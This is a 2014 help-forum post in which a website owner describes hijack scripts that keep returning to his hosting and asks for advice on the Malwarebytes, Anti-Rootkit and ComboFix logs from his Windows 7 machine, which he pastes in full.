Something following me

whiteguru

New Member
I seem to have a situation where *something* is following me around. I clean up my hosting from hijack scripts and malicious attack scripts, and I migrated to a new apache server, only to find that it has followed me there. Every time I clean up my domain hosting accounts, the scripts reappear. Many things are possible, including stealing my ftp passwords and the like. OK, so I have removed all that from the local machine. Installed Symantec Endpoint AV, found nothing. Installed Malwarebytes Antimalware Pro, that found nothing. Here is the report:

Malwarebytes Anti-Malware (PRO) 1.75.0.1300
www.malwarebytes.org

Database version: v2014.03.10.09

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.16428
Chris :: CHRIS-PC [administrator]

Protection: Enabled

11/03/2014 9:39:52 AM
mbam-log-2014-03-11 (09-39-52).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 244103
Time elapsed: 6 minute(s), 51 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

OK, I ran Malwarebytes Anti-Rootkit. That found nothing of interest. It seemed to remove its own portable versions:

Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-63-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-163975518-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
Removal finished

So I read a post here about ComboFix, grabbed it and ran it. Checked the results against a search result which brought me to this site.

Have run ComboFix and there is a report. I'd like to present that here and seek advice.

ComboFix 14-03-10.01 - Chris 11/03/2014 14:24:57.3.2 - x86
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.61.1033.18.3070.1819 [GMT 11:00]
Running from: c:\users\Chris\Downloads\1-secure\ComboFix.exe
Command switches used :: c:\users\Chris\Downloads\1-secure\CFScript.txt
AV: Symantec Endpoint Protection *Disabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
FW: Symantec Endpoint Protection *Disabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
SP: Symantec Endpoint Protection *Disabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-02-11 to 2014-03-11 )))))))))))))))))))))))))))))))
.
.
2014-03-11 03:46 . 2014-03-11 03:46 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-03-11 03:46 . 2014-03-11 03:46 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-11 01:59 . 2014-03-11 03:46 -------- d-----w- c:\users\Chris\AppData\Local\temp
2014-03-11 00:06 . 2014-03-11 00:20 -------- d-----w- c:\program files\WhatsRunning
2014-03-10 23:51 . 2014-03-10 23:51 -------- d--h--w- c:\windows\PIF
2014-03-10 22:57 . 2014-03-10 23:04 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-03-10 22:56 . 2014-03-10 22:56 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\users\Chris\AppData\Roaming\Malwarebytes
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\programdata\Malwarebytes
2014-03-10 22:38 . 2013-04-04 03:50 22856 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-03-09 09:27 . 2014-03-09 09:27 -------- d-----w- c:\users\Chris\AppData\Local\Symantec
2014-03-09 09:12 . 2014-03-09 09:28 -------- d-----w- c:\program files\Common Files\Symantec Shared
2014-03-09 09:12 . 2014-03-09 09:12 142936 ----a-w- c:\windows\system32\drivers\SYMEVENT.SYS
2014-03-09 09:10 . 2014-03-09 09:10 420752 ----a-w- c:\windows\system32\SymVPN.dll
2014-03-09 09:10 . 2014-03-09 09:10 33264 ----a-w- c:\windows\system32\drivers\WGX.SYS
2014-03-09 09:10 . 2014-03-09 09:10 136080 ----a-w- c:\windows\system32\FwsVpn.dll
2014-03-09 09:10 . 2014-03-09 09:10 361360 ----a-w- c:\windows\system32\sysfer.dll
2014-03-09 09:10 . 2014-03-09 09:10 126440 ----a-w- c:\windows\system32\drivers\SysPlant.sys
2014-03-09 09:10 . 2014-03-09 09:10 11152 ----a-w- c:\windows\system32\sysferThunk.dll
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\programdata\regid.1992-12.com.symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\windows\system32\drivers\SEP
2014-03-09 09:10 . 2014-03-10 21:39 -------- d-----w- c:\programdata\Symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\program files\Symantec
2014-02-20 20:29 . 2014-02-20 20:31 -------- d-----w- c:\programdata\WinZip
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-11 02:53 . 2010-02-13 22:24 16608 ----a-w- c:\windows\gdrv.sys
2014-02-23 09:56 . 2012-03-29 19:34 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-02-23 09:56 . 2011-05-17 23:08 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-01-19 02:39 . 2014-01-19 02:39 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-01-19 02:39 . 2014-01-19 02:39 645120 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-19 02:39 . 2014-01-19 02:39 194048 ----a-w- c:\windows\system32\elshyph.dll
2014-01-19 02:39 . 2014-01-19 02:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-19 02:39 . 2014-01-19 02:39 62464 ----a-w- c:\windows\system32\tdc.ocx
2014-01-19 02:39 . 2014-01-19 02:39 34816 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-19 02:39 . 2014-01-19 02:39 337408 ----a-w- c:\windows\system32\html.iec
2014-01-19 02:39 . 2014-01-19 02:39 182272 ----a-w- c:\windows\system32\msls31.dll
2014-01-19 02:39 . 2014-01-19 02:39 1818112 ----a-w- c:\windows\system32\wininet.dll
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-01-19 02:39 . 2014-01-19 02:39 1051136 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-19 02:39 . 2014-01-19 02:39 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-01-19 02:39 . 2014-01-19 02:39 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-01-19 02:39 . 2014-01-19 02:39 24576 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-19 02:39 . 2014-01-19 02:39 1926656 ----a-w- c:\windows\system32\inetcpl.cpl
2014-01-19 02:39 . 2014-01-19 02:39 151552 ----a-w- c:\windows\system32\iexpress.exe
2014-01-19 02:39 . 2014-01-19 02:39 139264 ----a-w- c:\windows\system32\wextract.exe
2014-01-19 02:39 . 2014-01-19 02:39 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-01-19 02:39 . 2014-01-19 02:39 86016 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-19 02:39 . 2014-01-19 02:39 74240 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-19 02:39 . 2014-01-19 02:39 553472 ----a-w- c:\windows\system32\jscript9diag.dll
2014-01-19 02:39 . 2014-01-19 02:39 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-01-19 02:39 . 2014-01-19 02:39 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-19 02:39 . 2014-01-19 02:39 4240384 ----a-w- c:\windows\system32\jscript9.dll
2014-01-19 02:39 . 2014-01-19 02:39 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-01-19 02:39 . 2014-01-19 02:39 36352 ----a-w- c:\windows\system32\imgutil.dll
2014-01-19 02:39 . 2014-01-19 02:39 13312 ----a-w- c:\windows\system32\mshta.exe
2014-01-19 02:39 . 2014-01-19 02:39 111616 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-19 02:39 . 2014-01-19 02:39 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-01-19 02:39 . 2014-01-19 02:39 69632 ----a-w- c:\windows\system32\smss.exe
2014-01-19 02:39 . 2014-01-19 02:39 640512 ----a-w- c:\windows\system32\advapi32.dll
2014-01-19 02:39 . 2014-01-19 02:39 619520 ----a-w- c:\windows\system32\tdh.dll
2014-01-19 02:39 . 2014-01-19 02:39 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-01-19 02:39 . 2014-01-19 02:39 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-01-19 02:39 . 2014-01-19 02:39 38912 ----a-w- c:\windows\system32\csrsrv.dll
2014-01-19 02:39 . 2014-01-19 02:39 1289096 ----a-w- c:\windows\system32\ntdll.dll
2014-01-19 02:39 . 2014-01-19 02:39 338944 ----a-w- c:\windows\system32\drivers\afd.sys
2014-01-19 02:39 . 2014-01-19 02:39 240496 ----a-w- c:\windows\system32\drivers\netio.sys
2014-01-19 02:39 . 2014-01-19 02:39 231424 ----a-w- c:\windows\system32\mswsock.dll
2014-01-19 02:39 . 2014-01-19 02:39 187752 ----a-w- c:\windows\system32\drivers\FWPKCLNT.SYS
2014-01-19 02:39 . 2014-01-19 02:39 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-01-19 02:38 . 2014-01-19 02:38 49152 ----a-w- c:\windows\system32\taskhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 6144 ---ha-w- c:\windows\system32\api-ms-win-security-base-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 5120 ---ha-w- c:\windows\system32\api-ms-win-core-file-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-synch-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-misc-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localization-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-memory-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-heap-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-util-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-string-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-profile-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-io-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-handle-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-debug-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-console-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 293376 ----a-w- c:\windows\system32\KernelBase.dll
2014-01-19 02:38 . 2014-01-19 02:38 271360 ----a-w- c:\windows\system32\conhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 169984 ----a-w- c:\windows\system32\winsrv.dll
2014-01-19 02:37 . 2014-01-19 02:37 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 906240 ----a-w- c:\windows\system32\FntCache.dll
2014-01-19 02:37 . 2014-01-19 02:37 604160 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-01-19 02:37 . 2014-01-19 02:37 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 364544 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-19 02:37 . 2014-01-19 02:37 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 293376 ----a-w- c:\windows\system32\dxgi.dll
2014-01-19 02:37 . 2014-01-19 02:37 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 249856 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-19 02:37 . 2014-01-19 02:37 2284544 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-19 02:37 . 2014-01-19 02:37 220160 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-19 02:37 . 2014-01-19 02:37 207872 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-19 02:37 . 2014-01-19 02:37 1988096 ----a-w- c:\windows\system32\d3d10warp.dll
2014-01-19 02:37 . 2014-01-19 02:37 187392 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-19 02:37 . 2014-01-19 02:37 161792 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-19 02:37 . 2014-01-19 02:37 1247744 ----a-w- c:\windows\system32\DWrite.dll
2014-01-19 02:37 . 2014-01-19 02:37 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2010-03-17 8546848]
"snpstd"="c:\windows\vsnpstd.exe" [2003-12-30 40960]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2011-11-01 59240]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"LWS"="c:\program files\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2012-09-07 296096]
"Dell V310-V510 Series Fax Server"="c:\program files\Dell V310-V510 Series\fm3032.exe" [2009-12-30 311296]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2013-07-01 254336]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Adobe Gamma Loader.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2010-2-14 113664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"mixer7"=wdmaud.drv
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Flowkeeper.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Flowkeeper.lnk
backup=c:\windows\pss\Flowkeeper.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\hpoddt01.exe.lnk
backup=c:\windows\pss\hpoddt01.exe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2012-07-01 12:20 116648 ----atw- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid HD]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2012-09-07 02:30 296096 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
R2 dleaCATSCustConnectService;dleaCATSCustConnectService;c:\windows\system32\spool\DRIVERS\W32X86\3\\dleaserv.exe [2009-07-01 98984]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [2013-04-04 701512]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-09-04 171680]
R2 WCMVCAM;WebcamMax, WDM Video Capture;c:\windows\system32\DRIVERS\wcmvcam.sys [2011-06-23 1068216]
R3 ewusbnet;HUAWEI USB-NDIS miniport;c:\windows\system32\DRIVERS\ewusbnet.sys [2009-10-21 198656]
R3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\DRIVERS\ewusbdev.sys [2009-10-12 101120]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-01-19 108032]
R3 PACSPTISVR-Sound_Organizer;PACSPTISVR-Sound_Organizer;c:\program files\Sony\Sound Organizer\Sony.Earth\PACSPTISVR.exe [2012-11-07 174176]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 SyDvCtrl;SyDvCtrl;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\SyDvCtrl32.sys [2013-10-21 28576]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-09-01 1343400]
S0 SymDS;Symantec Data Store;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMDS.SYS [2013-10-21 367704]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMEFA.SYS [2013-10-21 935512]
S1 BHDrvx86;BHDrvx86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\BASHDefs\20140304.011\BHDrvx86.sys [2014-03-03 1098968]
S1 ccSettings_{974A0163-23BB-4C9D-A3C2-611667F7A450};Symantec Endpoint Protection 12.1.4013.4013.105 Settings Manager;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\ccSetx86.sys [2013-10-21 134744]
S1 IDSVix86;IDSVix86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\IPSDefs\20140307.011\IDSvix86.sys [2014-03-07 394456]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\Ironx86.SYS [2013-10-21 175192]
S1 SYMNETS;Symantec Network Security WFP Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMNETS.SYS [2013-10-21 341080]
S2 dlea_device;dlea_device;c:\windows\system32\dleacoms.exe [2009-07-01 602792]
S2 DragonSvc;Dragon Service;c:\program files\Common Files\Nuance\dgnsvc.exe [2012-07-18 310232]
S2 GEST Service;GEST Service for program management.;c:\program files\GIGABYTE\EnergySaver\GSvr.exe [2008-09-24 68136]
S2 MBAMScheduler;MBAMScheduler;c:\program files\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-04-04 418376]
S2 SepMasterService;Symantec Endpoint Protection;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe [2013-10-21 144368]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2012-12-28 383416]
S2 UMVPFSrv;UMVPFSrv;c:\program files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2012-01-18 450848]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-02-17 108120]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-04-04 22856]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2009-07-13 139776]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-29 09:56]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000Core.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000UA.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 10.1.1.1
TCP: Interfaces\{9E575FD1-707C-49A4-AB7B-3B52A7908E9D}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{A8669315-9D96-4AC1-8C0E-A8D09B1F0C75}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D42CB96A-3720-412A-B8B3-1D254475ABC4}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D87D39B8-7A27-4D89-A4A0-DA761B812D05}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2364279-D312-4EF1-AE1C-683CB479397F}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2A95CE3-6580-4E6C-BA15-81E9DDF11D1B}: NameServer = 198.142.0.51 61.88.88.88
FF - ProfilePath - c:\users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\sclbjaf5.default\
FF - prefs.js: browser.startup.homepage - about:newtab
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SepMasterService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe\" /s \"Symantec Endpoint Protection\" /m \"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\sms.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SmcService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\Smc.exe\" /prefetch:1"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:61,9a,4c,64,7b,f9,ce,01
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ ]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ \OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.*5mõ ]
"0"=hex:47,3a,5c,55,74,69,6c,69,74,69,65,73,5c,4d,79,20,4d,75,73,69,63,5c,4d,
52,20,4d,49,53,54,45,52,20,2d,20,4b,79,72,69,65,2e,6d,70,33,00,00,72,69,65,\
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\SecuROM\License information*]
"datasecu"=hex:cb,b2,e6,c1,5d,39,51,5d,a1,bf,98,4a,8c,02,6c,e9,6c,55,9e,d4,b5,
ff,c0,55,f7,0d,cc,84,12,67,d9,81,a4,06,5e,7d,8a,d4,04,1f,82,a9,43,63,c4,2a,\
"rkeysecu"=hex:8f,82,27,2c,f0,1a,6a,7d,ee,8c,0e,e4,ff,c7,55,6b
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
